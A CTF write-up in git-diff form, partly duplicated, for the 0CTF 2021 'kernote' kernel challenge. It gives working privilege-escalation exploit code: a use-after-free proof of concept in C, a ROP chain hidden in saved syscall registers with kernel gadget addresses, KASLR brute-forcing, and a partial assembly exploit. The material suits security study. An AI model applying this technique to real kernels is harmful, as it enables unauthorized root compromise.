This is a kernel pwn challenge. The challenge uses the usual setup: a QEMU VM
+running Linux with a vulnerable module. We get an unprivileged shell in the VM
+and we have to exploit the kernel to become root and read the flag.
+
+
$ ls
+bzImage readme.md rootfs.img run.sh
+
+$ cat readme.md
+Here are some kernel config options in case you need it
+CONFIG_SLAB=y
+CONFIG_SLAB_FREELIST_RANDOM=y
+CONFIG_SLAB_FREELIST_HARDENED=y
+CONFIG_HARDENED_USERCOPY=y
+CONFIG_STATIC_USERMODEHELPER=y
+CONFIG_STATIC_USERMODEHELPER_PATH=""
+
+$ cat run.sh
+#!/bin/sh
+qemu-system-x86_64 \
+-m 128M \
+-kernel ./bzImage \
+-hda ./rootfs.img \
+-append "console=ttyS0 quiet root=/dev/sda rw init=/init oops=panic panic=1 panic_on_warn=1 kaslr pti=on" \
+-monitor /dev/null \
+-smp cores=2,threads=2 \
+-nographic \
+-cpu kvm64,+smep,+smap \
+-no-reboot \
+-snapshot
+
+
+
All the usual mitigations are enabled (SMEP, SMAP, KASLR, KPTI, …). The kernel
+also uses the SLAB allocator instead of the default SLUB and disables usermode
+helpers by hardcoding their path to “”. Furthermore the VM will shut down
+immediately if we cause any kernel warnings or panics.
+
+
rootfs.img is an ext4 disk. We can mount it to extract the files:
kptr_restrict=1 prevents us from reading kernel addresses from
+/proc/kallsyms and dmesg_restrict=1 prevents us from reading the kernel logs.
+
+
The interesting part is kernote.ko, the kernel module which contains the
+vulnerable code. My teammate busdma reverse
+engineered the module and quickly spotted some bugs. Here is the (cleaned up)
+decompilation.
The first bug is that note can point to freed memory if we set it to the address
+of a note and then free that note. The second bug is that command 0x666a
+increments the user_struct’s refcount but never decrements it. The second bug
+is useless because overflowing a refcount triggers a warning which shuts down
+the VM immediately, but the first bug looks promising. Later during the CTF the
+author of the task confirmed that the second bug was unintentional.
+
+
Command 0x666a looks like it might leak the contents of a note, but in
+practice it only does so when invoked by root and it logs the contents to dmesg,
+which we can’t access. Either way it’s not useful.
+
+
In conclusion, the bug lets us overwrite the first 8 bytes of a freed chunk in
+kmalloc-32. The challenge is to somehow use that to get root.
+
+
Exploitation
+
+
After reverse engineering the module busdma also wrote a PoC exploit that crashes
+the kernel with a controlled RIP. The PoC frees a note and reclaims the freed
+chunk with a struct seq_operations, which is heap allocated in kmalloc-32 and contains a function pointer
+in the first 8 bytes. It then uses the bug to overwrite the function pointer and
+reads from the seq file to call the overwritten pointer.
This is a great starting point but it’s not enough to own the kernel. We can’t
+directly jump to some code in userspace because of SMEP + KPTI. We also can’t
+(seemingly) start a ROP or JOP chain right away because we don’t control the
+contents of any of the registers or the memory they point to (except rax which
+contains our overwritten function pointer).
+
+
My goal at this point was to try and use our bug to get arbitrary read and write
+in the kernel.
+
+
My first idea was to overwrite a freelist pointer. By default the first 8 bytes
+of a free kmalloc chunk contain the freelist pointer and we can easily get
+arbitrary r/w by overwriting that. Unfortunately this challenge doesn’t use the
+default allocator. Instead the author enabled the older SLAB allocator which
+stores metadata out-of-line and prevents this attack.
+
+
My second idea was to corrupt the next pointer of a msg_msgseg. I had played
+corCTF about 1 month earlier and spent a lot of time failing to pwn the Fire of
+Salvation kernel challenge. That challenge let us overwrite the first 40 bytes
+of a freed chunk in kmalloc-4k, which is somewhat similar to what we have here.
+You can find the author’s writeup for that challenge here.
+We can reclaim the freed note with a 32-byte msg_msgseg, which contains a
+pointer to the next msgseg in the first 8 bytes, then hopefully use that to
+get arbitrary read and write, just like in that challenge. Unfortunately I
+couldn’t turn this into an arbitrary kernel r/w, even though I could crash the
+kernel with an arbitrary pointer dereference. The reason is that the bug doesn’t
+let us overwrite the m_ts field of msg_msg, so the kernel will stop reading
+and writing after the first msg_msgseg.
+
+
After spending hours on this idea and ultimately ruling it out I went back to
+busdma’s crash PoC and started looking for controllable memory in GDB. I
+eventually noticed that there were a lot of what looked like userspace pointers
+near the bottom of the kernel’s stack:
+
+
+
+
After looking at the system call handler for a bit it became clear that these
+are the saved userspace registers. One of the first things the system call
+handler does is to push a struct pt_regs on the stack.
+pt_regs
+contains the values of all the registers at the moment the system call was
+invoked. As far as I can tell all registers are saved on every syscall,
+despite what the comment on pt_regs says. Obviously the contents of pt_regs
+are fully controlled by userspace, minus some constraints such as that rax
+must contain the correct system call number.
At this point I had an idea: what if we could store a ROP chain in the contents
+of pt_regs? r8-r15, rbx, and rbp are ignored by the read syscall and
+can contain any value (except r11 which contains the saved rflags). This
+gives us about 80 bytes of contiguous controlled memory. Is this enough to fit
+a ROP chain that gives us root and returns to userspace without crashing? Can
+we even move the stack pointer to the beginning of the controlled area in a
+single gadget?
+
+
As luck would have it, the answer to the second question is yes! I found this
+gadget that moves the stack pointer by just the right amount when invoked from
+the overwritten seq_operations pointer:
+
+
0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
+
+
+
But still, 80 bytes is really not a lot. Can we fit our ROP chain in so little
+space? A typical payload used to get root in kernel exploits calls
+commit_creds(prepare_kernel_cred(NULL)). Doing this uses 32 bytes in our ROP
+chain. However in addition to this we have to return to userspace cleanly, or
+we will crash the VM before we can use our newly-acquired root credentials.
+Returning to userspace takes an additional 40 bytes because we need to set rcx
+to a valid userspace address and r11 to valid flags before we can ROP to
+syscall_return_via_sysret. This comes in at 72 bytes, just below our 80-byte
+budget. We can further optimize this down to 64 bytes if we do
+commit_creds(&init_cred) instead, and skip prepare_kernel_cred. init_cred
+is the cred structure used for the init process and it’s located in the
+kernel’s data section. Our final ROP chain then looks like this:
+
+
r15: 0xffffffff81075c4c: pop rdi; ret
+r14: 0xffffffff8266b780: &init_cred
+r13: 0xffffffff810c9dd5: commit_creds
+r12: 0xffffffff810761da: pop rcx; ret
+rbp: < address of our code in userspace >
+rbx: 0xffffffff8107605a: pop r11; ret
+r11: < valid rflags value >
+r10: 0xffffffff81c00109: return from syscall
+
+
+
We need precise control over the values stored in the registers when we invoke
+the syscall handler. We need to recover our userspace stack after returning.
+This is probably possible in C but I figured I should write a helper function
+in assembly instead, to have more precise control over the registers. The
+syscall instruction already stores the current value of rflags in r11 so
+we don’t have to set that register.
Combined with the seq_operations exploit this makes us root, and we can simply
+read and print the flag or execve a shell after returning to userspace.
+
+
There is still an elephant in the room though. So far we have assumed that we
+know the address of all of these gadgets, and yet we still have absolutely no
+leaks of kernel addresses or a way to bypass KASLR.
+
+
Luckily for us even with KASLR the base address of the kernel is not very random.
+In fact there are only 512 possible addresses at which the kernel will load
+itself. This is small enough that we can brute force it in a reasonable amount
+of time. We will keep trying our exploit assuming that the kernel’s base address
+is 0xffffffff81000000 (same as if there was no KASLR) and eventually we will
+succeed. We are nearly guaranteed to succeed at least once if we run the exploit
+~2000 times. In our experiments running the exploit against the remote system
+took about 5-10 seconds. We did some napkin math and concluded that we should
+be able to get the flag in about an hour or two by running multiple instances
+of the exploit in parallel. Since we still had several hours left before the
+end of the CTF we decided to go with that. We got the flag after about an hour.
+
+
I ended up writing an optimized version of the exploit entirely in assembly to
+make it smaller and speed up the brute forcing. The target VM has no internet
+access so we have to upload the exploit through the VM’s serial port which takes
+a long time. Even when using UPX and musl, the C exploit was about 18KB. The
+exploit written in assembly is only 342 bytes when gzipped, so it uploads much
+faster.
It is pretty clear that this solution is not what the author intended, but
+it was still fun and it got us a flag which is what counts. The intended
+solution was to overwrite a freed ldt_struct. You can find the author’s own
+writeup here.
+
+
Conclusion
+
+
Thanks to busdma for the help with reversing and the initial PoC exploit and to
+my teammates for letting me bounce ideas off of them. Thanks to 0ops and eee for
+the amazing CTF, we really had a lot of fun playing this one. Looking forward
+to next year’s edition :).
+
+
I don’t know if using pt_regs as ROP chain is a new technique or not. I’ve
+never heard of it before and I couldn’t find anything on Google. It seems pretty
+powerful though: it only requires RIP control and bypasses all mitigations
+except KASLR, assuming that the kernel has the right gadgets. Let me know if
+it’s been used before somewhere.
+
diff --git a/0CTF-2021-finals/pwn/kernote.md b/0CTF-2021-finals/pwn/kernote.md
new file mode 100755
index 0000000..a61b926
--- /dev/null
+++ b/0CTF-2021-finals/pwn/kernote.md
@@ -0,0 +1,694 @@
+# Kernote
+
+**Authors:** [Nspace](https://twitter.com/_MatteoRizzo)
+
+**Tags:** pwn, kernel
+
+**Points:** 750
+
+> Let's try kernote in kernel
+>
+> nc 42.192.68.11 12345
+> [Attachment](https://attachment.ctf.0ops.sjtu.cn/kernote_3157feafdcfaf6dcfa356a04ad57a056.tar.gz)
+> or [Attachment(MEGA)](https://mega.nz/file/axoHVaTa#cl_YEcpSn3W094l65jYVKugt0DWucl1YnuDGqq_OVN4)
+
+## Analysis
+
+This is a kernel pwn challenge. The challenge uses the usual setup: a QEMU VM
+running Linux with a vulnerable module. We get an unprivileged shell in the VM
+and we have to exploit the kernel to become root and read the flag.
+
+```
+$ ls
+bzImage readme.md rootfs.img run.sh
+
+$ cat readme.md
+Here are some kernel config options in case you need it
+CONFIG_SLAB=y
+CONFIG_SLAB_FREELIST_RANDOM=y
+CONFIG_SLAB_FREELIST_HARDENED=y
+CONFIG_HARDENED_USERCOPY=y
+CONFIG_STATIC_USERMODEHELPER=y
+CONFIG_STATIC_USERMODEHELPER_PATH=""
+
+$ cat run.sh
+#!/bin/sh
+qemu-system-x86_64 \
+-m 128M \
+-kernel ./bzImage \
+-hda ./rootfs.img \
+-append "console=ttyS0 quiet root=/dev/sda rw init=/init oops=panic panic=1 panic_on_warn=1 kaslr pti=on" \
+-monitor /dev/null \
+-smp cores=2,threads=2 \
+-nographic \
+-cpu kvm64,+smep,+smap \
+-no-reboot \
+-snapshot
+```
+
+All the usual mitigations are enabled (SMEP, SMAP, KASLR, KPTI, ...). The kernel
+also uses the SLAB allocator instead of the default SLUB and disables usermode
+helpers by hardcoding their path to "". Furthermore the VM will shut down
+immediately if we cause any kernel warnings or panics.
+
+`rootfs.img` is an ext4 disk. We can mount it to extract the files:
+
+```
+$ mount -o loop rootfs.img mount
+
+$ ls mount
+bin dev etc flag init kernote.ko linuxrc lost+found proc sbin sys tmp usr
+
+$ cat mount/init
+#!/bin/sh
+mount -t proc none /proc
+mount -t sysfs none /sys
+mount -t tmpfs tmpfs /tmp
+#mount -t devtmpfs devtmpfs /dev
+mkdir /dev/pts
+mount -t devpts devpts /dev/pts
+echo /sbin/mdev>/proc/sys/kernel/hotplug
+echo 1 > /proc/sys/kernel/dmesg_restrict
+echo 1 > /proc/sys/kernel/kptr_restrict
+echo "flag{testflag}">/flag
+chmod 660 /flag
+insmod /kernote.ko
+#/sbin/mdev -s
+chmod 666 /dev/kernote
+chmod 777 /tmp
+setsid cttyhack setuidgid 1000 sh
+poweroff -f
+```
+
+`kptr_restrict=1` prevents us from reading kernel addresses from
+`/proc/kallsyms` and `dmesg_restrict=1` prevents us from reading the kernel logs.
+
+The interesting part is `kernote.ko`, the kernel module which contains the
+vulnerable code. My teammate [busdma](https://twitter.com/busdma) reverse
+engineered the module and quickly spotted some bugs. Here is the (cleaned up)
+decompilation.
+
+```c
+uint64_t *buf[16];
+uint64_t *note;
+int major_num;
+struct class *module_class;
+struct device *module_device;
+spinlock_t spin;
+
+int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg);
+
+const struct file_operations kernote_fo = {
+ .unlocked_ioctl = kernote_ioctl,
+};
+
+int module_init(void)
+{
+ major_num = register_chrdev(0LL, "kernote", &kernote_fo);
+ if (major_num < 0) {
+ printk(KERN_INFO "[kernote] : Failed to register device\n");
+ return major_num;
+ }
+
+ module_class = class_create(THIS_MODULE, "kernote", &module_device);
+ if (IS_ERR(module_class)) {
+ unregister_chrdev(major_num, "kernote");
+ printk(KERN_INFO "[kernote] : Failed to create class\n");
+ return PTR_ERR(module_class);
+ }
+
+ module_device = device_create(module_class, NULL, MKDEV(major_num, 0), NULL, "kernote");
+ if (IS_ERR(module_device)) {
+ class_destroy(module_class);
+ unregister_chrdev(major_num, "kernote");
+ printk(KERN_INFO "[kernote] : Failed to create device\n");
+ return PTR_ERR(module_device);
+ }
+
+ printk(KERN_INFO "[kernote] : Insert module complete\n");
+ return 0;
+}
+
+int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg)
+{
+ int ret;
+
+ raw_spin_lock(&spin);
+
+ switch (cmd) {
+ // alloc note
+ case 0x6667:
+ if (arg > 15) {
+ ret = -1;
+ break;
+ }
+
+ uint64_t *newnote = kmalloc(32, GFP_KERNEL);
+ buf[arg] = newnote;
+ if (newnote == NULL) {
+ ret = -1;
+ break;
+ }
+
+ ret = 0;
+ break;
+
+ // free note
+ case 0x6668:
+ if (arg > 15 || buf[arg] == NULL) {
+ ret = -1;
+ break;
+ }
+
+ kfree(buf[arg]);
+ buf[arg] = 0;
+ ret = 0;
+ break;
+
+ // set note pointer
+ case 0x6666:
+ if (arg > 15) {
+ ret = -1;
+ break;
+ }
+
+ note = buf[arg];
+ break;
+
+ // write note
+ case 0x6669:
+ if (note) {
+ *note = arg;
+ ret = 0;
+ } else {
+ ret = -1;
+ }
+ break;
+
+ // inc refcount?
+ case 0x666a:
+ struct user_struct *user = current_task->cred->user;
+ refcount_inc(&user->__count);
+ if (user->uid != 0) {
+ printk(KERN_INFO "[kernote] : ********\n");
+ ret = -1;
+ } else if (note != NULL) {
+ printk(KERN_INFO "[kernote] : 0x%lx\n", *note);
+ ret = 0;
+ } else {
+ printk(KERN_INFO "[kernote] : No note\n");
+ ret = -1;
+ }
+ break;
+ }
+
+ spin_unlock(&spin);
+ return ret;
+}
+```
+
+The first bug is a use-after-free: `note` keeps pointing to freed memory if we
+point it at a note (command `0x6666`) and then free that note (command `0x6668`). The second bug is that command `0x666a`
+increments the `user_struct`'s refcount but never decrements it. The second bug
+is useless because overflowing a refcount triggers a warning which shuts down
+the VM immediately, but the first bug looks promising. Later during the CTF the
+author of the task confirmed that the second bug was unintentional.
+
+Command `0x666a` looks like it might leak the contents of a note, but in
+practice it only does so when invoked by root and it logs the contents to dmesg,
+which we can't access. Either way it's not useful.
+
+In conclusion, the bug lets us overwrite the first 8 bytes of a freed chunk in
+kmalloc-32. The challenge is to somehow use that to get root.
+
+## Exploitation
+
+After reverse engineering the module busdma also wrote a PoC exploit that crashes
+the kernel with a controlled RIP. The PoC frees a note and reclaims the freed
+chunk with a [`struct seq_operations`](https://elixir.bootlin.com/linux/latest/source/include/linux/seq_file.h#L31), which is heap allocated in kmalloc-32 and contains a function pointer
+in the first 8 bytes. It then uses the bug to overwrite the function pointer and
+reads from the seq file to call the overwritten pointer.
+
+```c
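+#include <assert.h>
+#include <fcntl.h>
+#include <stdint.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+
+#define SET_NOTE 0x6666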
+#define ALLOC_ENTRY 0x6667
+#define FREE_ENTRY 0x6668
+#define WRITE_NOTE 0x6669
+
+static int kfd;
+
+static int set_note(uint64_t idx)
+{
+ return ioctl(kfd, SET_NOTE, idx);
+}
+
+static int alloc_entry(uint64_t idx)
+{
+ return ioctl(kfd, ALLOC_ENTRY, idx);
+}
+
+static int free_entry(uint64_t idx)
+{
+ return ioctl(kfd, FREE_ENTRY, idx);
+}
+
+static int write_note(uint64_t val)
+{
+ return ioctl(kfd, WRITE_NOTE, val);
+}
+
+int main(void)
+{
+ kfd = open("/dev/kernote", O_RDWR);
+ assert(kfd > 0);
+
+ for (int i = 0; i < 0x100; i++) {
+ alloc_entry(0);
+ }
+ alloc_entry(1);
+ set_note(1);
+ free_entry(1);
+
+ int fd = open("/proc/self/stat", O_RDONLY);
+
+ write_note(0x4141414141414141);
+
+ char buf[32] = {};
+ read(fd, buf, sizeof(buf));
+
+ return 0;
+}
+```
+
+```
+[ 3.856543] general protection fault, probably for non-canonical address 0x4141414141414141: 0000 [#1] SMP PTI
+[ 3.858362] CPU: 0 PID: 141 Comm: pwn Tainted: G OE 5.11.9 #2
+[ 3.859598] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
+[ 3.861074] RIP: 0010:__x86_indirect_thunk_rax+0x3/0x5
+[ 3.861995] Code: 06 d7 ff 31 c0 e9 43 06 d7 ff <...>
+[ 3.865260] RSP: 0018:ffffc90000253dc0 EFLAGS: 00010246
+[ 3.866187] RAX: 4141414141414141 RBX: ffffc90000253e60 RCX: 0000000000000000
+[ 3.867440] RDX: 0000000000000000 RSI: ffff888004d47be0 RDI: ffff888004d47bb8
+[ 3.868698] RBP: ffffc90000253e18 R08: 0000000000001000 R09: ffff888003c63000
+[ 3.869960] R10: ffffc90000253e68 R11: 0000000000000000 R12: 0000000000000000
+[ 3.871217] R13: ffff888004d47bb8 R14: ffff888004d47be0 R15: ffffc90000253ef0
+[ 3.872474] FS: 0000000001e68380(0000) GS:ffff888007600000(0000) knlGS:0000000000000000
+[ 3.873898] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 3.874914] CR2: 000000000048afd0 CR3: 0000000004cca000 CR4: 00000000003006f0
+```
+
+This is a great starting point but it's not enough to own the kernel. We can't
+directly jump to some code in userspace because of SMEP + KPTI. We also can't
+(seemingly) start a ROP or JOP chain right away because we don't control the
+contents of any of the registers or the memory they point to (except rax which
+contains our overwritten function pointer).
+
+My goal at this point was to try and use our bug to get arbitrary read and write
+in the kernel.
+
+My first idea was to overwrite a freelist pointer. By default the first 8 bytes
+of a free kmalloc chunk contain the freelist pointer and we can easily get
+arbitrary r/w by overwriting that. Unfortunately this challenge doesn't use the
+default allocator. Instead the author enabled the older SLAB allocator which
+stores metadata out-of-line and prevents this attack.
+
+My second idea was to corrupt the next pointer of a `msg_msgseg`. I had played
+corCTF about 1 month earlier and spent a lot of time failing to pwn the `Fire of
+Salvation` kernel challenge. That challenge let us overwrite the first 40 bytes
+of a freed chunk in kmalloc-4k, which is somewhat similar to what we have here.
+You can find the author's writeup for that challenge [here](https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html).
+We can reclaim the freed note with a 32-byte `msg_msgseg`, which contains a
+pointer to the next `msgseg` in the first 8 bytes, then hopefully use that to
+get arbitrary read and write, just like in that challenge. Unfortunately I
+couldn't turn this into an arbitrary kernel r/w, even though I could crash the
+kernel with an arbitrary pointer dereference. The reason is that the bug doesn't
+let us overwrite the `m_ts` field of `msg_msg`, so the kernel will stop reading
+and writing after the first `msg_msgseg`.
+
+After spending hours on this idea and ultimately ruling it out I went back to
+busdma's crash PoC and started looking for controllable memory in GDB. I
+eventually noticed that there were a lot of what looked like userspace pointers
+near the bottom of the kernel's stack:
+
+![](kernote1.png)
+
+After looking at the system call handler for a bit it became clear that these
+are the saved userspace registers. One of the first things the system call
+handler does is to [push](https://elixir.bootlin.com/linux/v5.11.9/source/arch/x86/entry/entry_64.S#L115) a `struct pt_regs` on the stack.
+[`pt_regs`](https://elixir.bootlin.com/linux/v5.11.9/source/arch/x86/include/uapi/asm/ptrace.h#L44)
+contains the values of all the registers at the moment the system call was
+invoked. As far as I can tell all registers are [saved](https://elixir.bootlin.com/linux/v5.11.9/source/arch/x86/entry/calling.h#L100) on every syscall,
+despite what the comment on `pt_regs` says. Obviously the contents of `pt_regs`
+are fully controlled by userspace, minus some constraints such as that `rax`
+must contain the correct system call number.
+
+```c
+struct pt_regs {
+ unsigned long r15;
+ unsigned long r14;
+ unsigned long r13;
+ unsigned long r12;
+ unsigned long rbp;
+ unsigned long rbx;
+ unsigned long r11;
+ unsigned long r10;
+ unsigned long r9;
+ unsigned long r8;
+ unsigned long rax;
+ unsigned long rcx;
+ unsigned long rdx;
+ unsigned long rsi;
+ unsigned long rdi;
+ unsigned long orig_rax;
+ unsigned long rip;
+ unsigned long cs;
+ unsigned long eflags;
+ unsigned long rsp;
+ unsigned long ss;
+};
+```
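To make the layout easier to reason about, here is a small Python sketch (not part of the original exploit) that computes the byte offset of every field in the `struct pt_regs` listing above. `PtRegs` and `offsets` are names made up for this illustration, and the sketch assumes every field is a plain 64-bit value, as on x86-64.

```python
import ctypes

# Field order copied from the struct pt_regs listing above (x86-64).
FIELDS = [
    "r15", "r14", "r13", "r12", "rbp", "rbx", "r11", "r10", "r9", "r8",
    "rax", "rcx", "rdx", "rsi", "rdi", "orig_rax",
    "rip", "cs", "eflags", "rsp", "ss",
]


class PtRegs(ctypes.Structure):
    """Hypothetical mirror of pt_regs: every field is a 64-bit integer."""
    _fields_ = [(name, ctypes.c_uint64) for name in FIELDS]


def offsets():
    """Map each register name to its byte offset inside pt_regs."""
    return {name: getattr(PtRegs, name).offset for name in FIELDS}


if __name__ == "__main__":
    for name, off in offsets().items():
        print(f"{off:#06x}  {name}")
    print("sizeof(struct pt_regs) =", ctypes.sizeof(PtRegs))
```

Under that assumption `r15` through `r8` occupy the first 80 bytes of the structure, and the whole structure is 168 bytes long.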
+
+At this point I had an idea: what if we could store a ROP chain in the contents
+of `pt_regs`? `r8`-`r15`, `rbx`, and `rbp` are ignored by the `read` syscall and
+can contain any value (except `r11` which contains the saved `rflags`). This
+gives us about 80 bytes of contiguous controlled memory. Is this enough to fit
+a ROP chain that gives us root and returns to userspace without crashing? Can
+we even move the stack pointer to the beginning of the controlled area in a
+single gadget?
+
+As luck would have it, the answer to the second question is yes! I found this
+gadget that moves the stack pointer by just the right amount when invoked from
+the overwritten `seq_operations` pointer:
+
+```
+0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
+```
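As a sanity check, the arithmetic can be replayed with the `RSP` value from the crash log above. This Python sketch is an illustration, not part of the exploit. It assumes 16 KiB size-aligned kernel stacks, that `pt_regs` sits at the very top of the stack with no padding, and that the gadget starts executing with the same `RSP` that the crash log shows. `stack_top`, `pt_regs_base` and `ret_slot` are hypothetical helper names.

```python
RSP_AT_CRASH = 0xFFFFC90000253DC0  # RSP value printed in the crash log above
THREAD_SIZE = 0x4000               # assumption: 16 KiB, size-aligned kernel stack
PT_REGS_SIZE = 21 * 8              # 21 saved 64-bit registers
ADD_RSP = 0x180                    # "add rsp, 0x180" in the gadget
POPS = 3                           # pop rbx; pop r12; pop rbp


def stack_top(rsp):
    """Round rsp up to the end of its (assumed) THREAD_SIZE-aligned stack."""
    return (rsp & ~(THREAD_SIZE - 1)) + THREAD_SIZE


def pt_regs_base(rsp):
    """Address of pt_regs, assuming it sits at the very top of the stack."""
    return stack_top(rsp) - PT_REGS_SIZE


def ret_slot(rsp):
    """Address from which the gadget's final ret reads its return target."""
    return rsp + ADD_RSP + POPS * 8


if __name__ == "__main__":
    print("pt_regs base:", hex(pt_regs_base(RSP_AT_CRASH)))
    print("ret slot:    ", hex(ret_slot(RSP_AT_CRASH)))
```

If these assumptions hold, the final `ret` pops its target from the first slot of `pt_regs`, which is the saved `r15`, and the three `pop`s before it consume the 24 bytes just below.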
+
+But still, 80 bytes is really not a lot. Can we fit our ROP chain in so little
+space? A typical payload used to get root in kernel exploits calls
+`commit_creds(prepare_kernel_cred(NULL))`. Doing this uses 32 bytes in our ROP
+chain. However in addition to this we have to return to userspace cleanly, or
+we will crash the VM before we can use our newly-acquired root credentials.
+Returning to userspace takes an additional 40 bytes because we need to set `rcx`
+to a valid userspace address and `r11` to valid flags before we can ROP to
+`syscall_return_via_sysret`. This comes in at 72 bytes, just below our 80-byte
+budget. We can further optimize this down to 64 bytes if we do
+`commit_creds(&init_cred)` instead, and skip `prepare_kernel_cred`. `init_cred`
+is the `cred` structure used for the init process and it's located in the
+kernel's data section. Our final ROP chain then looks like this:
+
+```
+r15: 0xffffffff81075c4c: pop rdi; ret
+r14: 0xffffffff8266b780: &init_cred
+r13: 0xffffffff810c9dd5: commit_creds
+r12: 0xffffffff810761da: pop rcx; ret
+rbp: < address of our code in userspace >
+rbx: 0xffffffff8107605a: pop r11; ret
+r11: < valid rflags value >
+r10: 0xffffffff81c00109: return from syscall
+```
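The byte counting above can be written down as a quick Python sketch. It is only an illustration: the slot names follow the `pt_regs` listing, the chain entries are the labels from the listing above rather than real addresses, and `layout` and `chain_size` are made-up helper names.

```python
QWORD = 8

# Controllable pt_regs slots, lowest address first (r15 is popped first).
SLOTS = ["r15", "r14", "r13", "r12", "rbp", "rbx", "r11", "r10", "r9", "r8"]
BUDGET = len(SLOTS) * QWORD

# Labels only; the real chain uses the kernel addresses listed above.
CHAIN = [
    "pop rdi; ret",
    "&init_cred",
    "commit_creds",
    "pop rcx; ret",
    "userspace return address",
    "pop r11; ret",
    "rflags",
    "return from syscall",
]


def chain_size(chain):
    """Number of bytes the chain occupies on the stack."""
    return len(chain) * QWORD


def layout(chain):
    """Pair every chain entry with the register that has to carry it."""
    if chain_size(chain) > BUDGET:
        raise ValueError("chain does not fit in the controlled area")
    return list(zip(SLOTS, chain))


if __name__ == "__main__":
    for reg, entry in layout(CHAIN):
        print(f"{reg:>3}: {entry}")
    print(f"{chain_size(CHAIN)} of {BUDGET} bytes used")
```

The point of lining the chain up this way is that the `rflags` operand of `pop r11; ret` has to land in the `r11` slot, which is the one slot we do not choose ourselves.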
+
+We need precise control over the values stored in the registers when we invoke
+the syscall handler, and we need to recover our userspace stack after returning.
+This is probably possible in C but I figured I should write a helper function
+in assembly instead, to have more precise control over the registers. The
+`syscall` instruction already stores the current value of `rflags` in `r11` so
+we don't have to set that register.
+
+```x86asm
+pwn:
+ mov [user_rsp], rsp
+ mov r15, 0xffffffff81075c4c
+ mov r14, 0xffffffff8266b780
+ mov r13, 0xffffffff810c9dd5
+ mov r12, 0xffffffff810761da
+ lea rbp, [.after_syscall]
+ mov rbx, 0xffffffff8107605a
+ mov r10, 0xffffffff81c00109
+ ; SYS_read
+ xor eax, eax
+ syscall
+.after_syscall:
+ mov rsp, [user_rsp]
+ ret
+
+user_rsp: dq 0
+```
+
+Combined with the `seq_operations` exploit this makes us root, and we can simply
+read and print the flag or `execve` a shell after returning to userspace.
+
+There is still an elephant in the room though. So far we have assumed that we
+know the address of all of these gadgets, and yet we still have absolutely no
+leaks of kernel addresses or a way to bypass KASLR.
+
+Luckily for us, even with KASLR the base address of the kernel is not very random.
+In fact there are only 512 possible addresses at which the kernel will load
+itself. This is small enough that we can brute force it in a reasonable amount
+of time. We will keep trying our exploit assuming that the kernel's base address
+is `0xffffffff81000000` (same as if there was no KASLR) and eventually we will
+succeed. We are nearly guaranteed to succeed at least once if we run the exploit
+~2000 times. In our experiments running the exploit against the remote system
+took about 5-10 seconds. We did some napkin math and concluded that we should
+be able to get the flag in about an hour or two by running multiple instances
+of the exploit in parallel. Since we still had several hours left before the
+end of the CTF we decided to go with that. We got the flag after about an hour.
+
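The napkin math can be sketched in a few lines of Python. This is an illustration, not the calculation we actually did during the CTF. It assumes that every boot picks one of the 512 slots uniformly and independently of previous boots, and the worker counts in the example are hypothetical.

```python
import math

KASLR_SLOTS = 512  # number of possible kernel base addresses, from the text


def p_success(tries, slots=KASLR_SLOTS):
    """Probability that at least one of `tries` independent attempts hits."""
    return 1.0 - (1.0 - 1.0 / slots) ** tries


def tries_for(confidence, slots=KASLR_SLOTS):
    """Smallest number of attempts that succeeds with the given probability."""
    return math.ceil(math.log(1.0 - confidence) / math.log(1.0 - 1.0 / slots))


def hours(tries, seconds_per_try, workers):
    """Wall-clock time if `workers` instances run in parallel."""
    return tries * seconds_per_try / workers / 3600.0


if __name__ == "__main__":
    print(f"P(success within 2000 tries) = {p_success(2000):.3f}")
    print(f"tries for a 50% chance       = {tries_for(0.5)}")
    for workers in (1, 4, 8):  # hypothetical numbers of parallel instances
        print(f"{workers} worker(s), 10 s per try: {hours(2000, 10, workers):.1f} h")
```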
+I ended up writing an optimized version of the exploit entirely in assembly to
+make it smaller and speed up the brute forcing. The target VM has no internet
+access so we have to upload the exploit through the VM's serial port which takes
+a long time. Even when using UPX and musl, the C exploit was about 18KB. The
+exploit written in assembly is only 342 bytes when gzipped, so it uploads much
+faster.
+
+```x86asm
+; Keep running this exploit until it works, which should take about 512 tries.
+; Or alternatively find a KASLR bypass :)
+
+; Emit 64-bit code.
+bits 64
+; Use RIP-relative addressing by default.
+default rel
+; Load at this address
+org 0x40000000
+
+ELFCLASS64 equ 2
+ELFDATA2LSB equ 1
+EV_CURRENT equ 1
+ELFOSABI_NONE equ 0
+ET_EXEC equ 2
+EM_X86_64 equ 62
+PT_LOAD equ 1
+PF_X equ 1
+PF_W equ 2
+PF_R equ 4
+O_RDONLY equ 0
+O_RDWR equ 2
+
+; 64-bit ELF header.
+elfh:
+; e_ident
+db 0x7f, 'ELF', ELFCLASS64, ELFDATA2LSB, EV_CURRENT, ELFOSABI_NONE, 0, 0, 0, 0, 0, 0, 0, 0
+; e_type
+dw ET_EXEC
+; e_machine
+dw EM_X86_64
+; e_version
+dd EV_CURRENT
+; e_entry
+dq _start
+; e_phoff
+dq phdr - $$
+; e_shoff
+dq 0
+; e_flags
+dd 0
+; e_ehsize
+dw ehsize
+; e_phentsize
+dw phsize
+; e_phnum
+dw 1
+; e_shentsize
+dw 0
+; e_shnum
+dw 0
+; e_shstrndx
+dw 0
+
+; Size of the elf header.
+ehsize equ $ - elfh
+
+; 64-bit program header.
+phdr:
+; p_type;
+dd PT_LOAD
+; p_flags;
+dd PF_R | PF_W | PF_X
+; p_offset;
+dq 0
+; p_vaddr;
+dq $$
+; p_paddr;
+dq $$
+; p_filesz;
+dq filesize
+; p_memsz;
+dq filesize
+; p_align;
+dq 0x1000
+
+phsize equ $ - phdr
+
+exit:
+ mov eax, 60
+ syscall
+ ud2
+
+open:
+ mov eax, 2
+ syscall
+ ret
+
+ioctl:
+ mov eax, 16
+ syscall
+ ret
+
+execve:
+ mov eax, 59
+ syscall
+ ud2
+
+set_note:
+ mov edx, edi
+ mov edi, [kfd]
+ mov esi, 0x6666
+ jmp ioctl
+
+alloc_entry:
+ mov edx, edi
+ mov edi, [kfd]
+ mov esi, 0x6667
+ jmp ioctl
+
+free_entry:
